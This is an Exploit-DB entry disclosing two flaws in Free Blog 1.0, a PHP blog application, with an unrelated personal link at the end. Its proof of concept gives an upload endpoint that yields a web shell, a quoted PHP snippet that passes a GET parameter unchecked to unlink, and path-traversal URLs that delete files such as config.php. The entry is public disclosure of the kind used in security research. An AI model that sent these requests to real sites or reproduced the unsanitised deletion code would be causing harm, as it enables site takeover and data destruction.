Free Blog 1.0 - Multiple Vulnerabilities

Author: cr4wl3r
type: webapps
platform: php
port: 
date_added: 2013-01-09  
date_updated: 2014-01-02  
verified: 1  
codes: OSVDB-89111;OSVDB-89110  
tags:   
aliases:   
screenshot_url:   
application_url: http://www.exploit-db.comfree-blog.zip  

raw file: 23994.txt  
# Free Blog 1.0 Multiple Vulnerability
# By cr4wl3r http://bastardlabs.info
# http://bastardlabs.info/exploits/Free_Blog.txt
# Software Link: http://blog.sdnex.com/
# Tested: Ubuntu 12.04.1 LTS

Proof of concept:

Arbitrary File Upload Vulnerability

   http://bastardlabs/blog_path/up.php

Shell will be available here

   http://bastardlabs/blog_path/log/images/shell.php



Arbitrary File Deletion Vulnerability

----------
49 <?php
50 if($_GET['del']){
51 $id=$_GET['del'];
52 unlink("./log/images/$id");
53 }
54 ?>
----------

   http://bastardlabs/blog_path/up.php?del=../../[file]
   http://bastardlabs/blog_path/up.php?del=../../config.php

------------------------------
My sweetheart
http://www.photoshow.com/watch/rx9IX5ZS